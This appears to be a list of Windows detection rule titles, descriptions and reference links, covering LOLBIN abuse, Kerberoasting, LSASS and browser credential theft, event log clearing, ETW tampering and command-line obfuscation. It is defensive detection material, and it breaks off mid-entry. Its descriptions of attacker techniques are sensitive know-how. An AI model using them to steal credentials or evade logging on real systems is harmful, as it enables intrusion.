Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) |
https://twitter.com/nao_sec/status/1530196847679401984, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/, https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/ |
Potential Suspicious Activity Using SeCEdit |
Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy |
https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit |
Suspicious Serv-U Process Pattern |
Detects a suspicious process pattern which could be a sign of an exploited Serv-U service |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Uncommon Child Process Of Setres.EXE |
Detects uncommon child processes of Setres.EXE.
Setres.EXE is a Windows Server-only process and tool that can be used to set the screen resolution.
It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
|
https://lolbas-project.github.io/lolbas/Binaries/Setres/, https://twitter.com/0gtweet/status/1583356502340870144, https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11) |
Potential SPN Enumeration Via Setspn.EXE |
Detects service principal name (SPN) enumeration used for Kerberoasting |
https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation, https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019 |
Setup16.EXE Execution With Custom .Lst File |
Detects the execution of "Setup16.EXE", an old installation utility, with a custom ".lst" file.
These ".lst" files can contain references to external programs that "Setup16.EXE" will execute.
Attackers and adversaries might leverage this as a living-off-the-land utility.
|
https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/ |
Suspicious Execution of Shutdown |
Detects use of the command line to shut down or reboot Windows |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown |
Suspicious Execution of Shutdown to Log Out |
Detects the rare use of the command line tool shutdown to log off a user |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown |
Uncommon Sigverif.EXE Child Process |
Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.
|
https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/, https://twitter.com/0gtweet/status/1457676633809330184 |
Uncommon Child Processes Of SndVol.exe |
Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) |
https://twitter.com/Max_Mal_/status/1661322732456353792 |
Audio Capture via SoundRecorder |
Detects an attacker collecting audio via the SoundRecorder application. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html |
Suspicious Splwow64 Without Params |
Detects suspicious Splwow64.exe process without any command line parameters |
https://twitter.com/sbousseaden/status/1429401053229891590?s=12 |
Suspicious Spool Service Child Process |
Detects suspicious print spool service (spoolsv.exe) child processes. |
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md |
Veeam Backup Database Suspicious Query |
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
VeeamBackup Database Credentials Dump Via Sqlcmd.EXE |
Detects dump of credentials in VeeamBackup dbo |
https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html |
SQLite Chromium Profile Data DB Access |
Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. |
https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ |
SQLite Firefox Profile Data DB Access |
Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ |
Arbitrary File Download Via Squirrel.EXE |
Detects the usage of "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron-based software installations (Slack, Teams, Discord, etc.)
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
Process Proxy Execution Via Squirrel.EXE |
Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron-based software installations (Slack, Teams, Discord, etc.)
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
Port Forwarding Activity Via SSH.EXE |
Detects port forwarding activity via SSH.exe |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Program Executed Using Proxy/Local Command Via SSH.EXE |
Detects usage of the "ssh.exe" binary as a proxy to launch other programs. |
https://lolbas-project.github.io/lolbas/Binaries/Ssh/, https://github.com/LOLBAS-Project/LOLBAS/pull/211/files, https://gtfobins.github.io/gtfobins/ssh/, https://man.openbsd.org/ssh_config#ProxyCommand, https://man.openbsd.org/ssh_config#LocalCommand |
Potential RDP Tunneling Via SSH |
Detects execution of ssh.exe to perform data exfiltration and tunneling through RDP |
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Potential Amazon SSM Agent Hijacking |
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. |
https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ |
Execution via stordiag.exe |
Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe |
https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html, https://twitter.com/eral4m/status/1451112385041911809 |
Start of NT Virtual DOS Machine |
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications |
https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support, https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7, https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/, https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/ |
Abused Debug Privilege by Arbitrary Parent Processes |
Detection of unusual child processes by different system processes |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg |
User Added to Local Administrators Group |
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". |
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
User Added To Highly Privileged Group |
Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". |
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
User Added to Remote Desktop Users Group |
Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". |
https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ |
Execute From Alternate Data Streams |
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md |
Always Install Elevated Windows Installer |
Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg |
Potentially Suspicious Windows App Activity |
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution |
https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
Arbitrary Shell Command Execution Via Settingcontent-Ms |
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. |
https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 |
Phishing Pattern ISO in Archive |
Detects cases in which an ISO file is opened within an archiver like 7Zip or WinRAR, which is a sign of phishing, as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (Mark of the Web) |
https://twitter.com/1ZRR4H/status/1534259727059787783, https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ |
Automated Collection Command Prompt |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
Bad Opsec Defaults Sacrificial Processes With Improper Arguments |
Detects attackers using tooling with bad opsec defaults.
E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
|
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/, https://www.cobaltstrike.com/help-opsec, https://twitter.com/CyberRaiju/status/1251492025678983169, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32, https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool, https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool |
Potential Suspicious Browser Launch From Document Reader Process |
Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe or Microsoft Office, and connects to a web application over HTTP(S). This could indicate a possible phishing attempt.
|
https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/, https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ |
Potential Browser Data Stealing |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
Suspicious Child Process Created as System |
Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://github.com/antonioCoco/RogueWinRM, https://twitter.com/Cyb3rWard0g/status/1453123054243024897 |
Potential Commandline Obfuscation Using Escape Characters |
Detects potential commandline obfuscation using known escape characters |
https://twitter.com/vysecurity/status/885545634958385153, https://twitter.com/Hexacorn/status/885553465417756673, https://twitter.com/Hexacorn/status/885570278637678592, https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques, https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ |
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image |
Detects potential commandline obfuscation using unicode characters.
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
|
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http |
Potential Command Line Path Traversal Evasion Attempt |
Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline |
https://twitter.com/hexacorn/status/1448037865435320323, https://twitter.com/Gal_B1t/status/1062971006078345217 |
Suspicious Copy From or To System Directory |
Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
|
https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Copy From Or To Admin Share Or Sysvol Folder |
Detects a copy command or a copy utility execution to or from an Admin share or remote |
https://twitter.com/SBousseaden/status/1211636381086339073, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Potential Crypto Mining Activity |
Detects command line parameters or strings often used by crypto miners |
https://www.poolwatch.io/coin/monero |
LOL-Binary Copied From System Directory |
Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
|
https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Potential Data Exfiltration Activity Via CommandLine Tools |
Detects the use of various CLI utilities exfiltrating data via web requests |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ |
Raccine Uninstall |
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. |
https://github.com/Neo23x0/Raccine |
Suspicious Double Extension File Execution |
Detects suspicious use of an .exe extension after a non-executable file extension (e.g. .pdf.exe) or after a run of spaces or underscores, used to cloak the executable file in spear phishing campaigns |
https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html, https://twitter.com/blackorbird/status/1140519090961825792 |
Suspicious Parent Double Extension File Execution |
Detect execution of suspicious double extension files in ParentCommandLine |
https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa |
Suspicious Download from Office Domain |
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents |
https://twitter.com/an0n_r0/status/1474698356635193346?s=12, https://twitter.com/mrd0x/status/1475085452784844803?s=12 |
DumpStack.log Defender Evasion |
Detects the use of the filename DumpStack.log to evade Microsoft Defender |
https://twitter.com/mrd0x/status/1479094189048713219 |
Always Install Elevated MSI Spawned Cmd And Powershell |
Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg |
Suspicious Electron Application Child Processes |
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
|
https://taggart-tech.com/quasar-electron/, https://github.com/mttaggart/quasar, https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf |
Potentially Suspicious Electron Application CommandLine |
Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. |
https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf, https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc |
Elevated System Shell Spawned From Uncommon Parent Location |
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location. |
https://github.com/Wh04m1001/SysmonEoP |
Hidden Powershell in Link File Pattern |
Detects events that appear when a user clicks on a link file with a PowerShell command in it |
https://www.x86matthew.com/view_post?id=embed_exe_lnk |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 |
Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity. |
Internal Research |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 |
Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity. |
Internal Research |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 |
Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity. |
Internal Research |
ETW Logging Tamper In .NET Processes Via CommandLine |
Detects changes to environment variables related to ETW logging via the CommandLine.
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
|
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 |
Detects the usage of emojis in the command line, which could be a sign of potential defense evasion activity. |
Internal Research |
ETW Trace Evasion Activity |
Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://abuse.io/lockergoga.txt, https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 |
Suspicious Eventlog Clearing or Configuration Change Activity |
Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
This technique has been seen used by threat actors and ransomware strains in order to evade defenses.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee, https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/ |
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities |
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.
|
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://www.group-ib.com/blog/apt41-world-tour-2021/, https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil |
Potentially Suspicious Execution From Parent Process In Public Folder |
Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
|
https://redcanary.com/blog/blackbyte-ransomware/ |
Process Execution From A Potentially Suspicious Folder |
Detects a potentially suspicious execution from an uncommon folder. |
https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt, https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses, https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/, https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md |
Suspicious File Characteristics Due to Missing Fields |
Detects executables in the Downloads folder without FileVersion, Description, Product or Company fields, likely created with py2exe |
https://securelist.com/muddywater/88059/, https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection |
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS |
Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI |
Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
|
https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3 |
Writing Of Malicious Files To The Fonts Folder |
Monitors for the hiding of possibly malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privileges to be written to and executed from. |
https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ |
Potential Homoglyph Attack Using Lookalike Characters |
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that
are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.
|
https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php |
Execution Of Non-Existing File |
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) |
https://pentestlaboratories.com/2021/12/08/process-ghosting/ |
Base64 MZ Header In CommandLine |
Detects encoded base64 MZ header in the commandline |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Potential WinAPI Calls Via CommandLine |
Detects the use of WinAPI functions via the commandline, as seen used by threat actors via the tool winapiexec |
https://twitter.com/m417z/status/1566674631788007425 |
Potentially Suspicious JWT Token Search Via CLI |
Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
This string is used as an anchor to look for the start of the JWT token used by Microsoft Office and similar apps.
|
https://mrd0x.com/stealing-tokens-from-office-applications/ |
Local Accounts Discovery |
Local account and system owner/user discovery using operating system utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md |
LOLBIN Execution From Abnormal Drive |
Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. |
https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://www.scythe.io/library/threat-emulation-qakbot, https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ |
LSASS Dump Keyword In CommandLine |
Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
|
https://github.com/Hackndo/lsassy, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump |
Potential File Download Via MS-AppInstaller Protocol Handler |
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE.
The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
|
https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ |
Suspicious Network Command |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows |
Suspicious Scan Loop Network |
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://ss64.com/nt/for.html, https://ss64.com/ps/foreach-object.html |
Potential Network Sniffing Activity Using Network Tools |
Detects potential network sniffing via use of network tools such as "tshark" or "windump".
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
Execution of Suspicious File Type Extension |
Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
This rule might require some initial baselining to align with some third party tooling in the user environment.
|
https://pentestlaboratories.com/2021/12/08/process-ghosting/ |
Non-privileged Usage of Reg or Powershell |
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg |
Process Launched Without Image Name |
Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. |
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Suspicious Process Patterns NTDS.DIT Exfil |
Detects suspicious process patterns used in NTDS.DIT exfiltration |
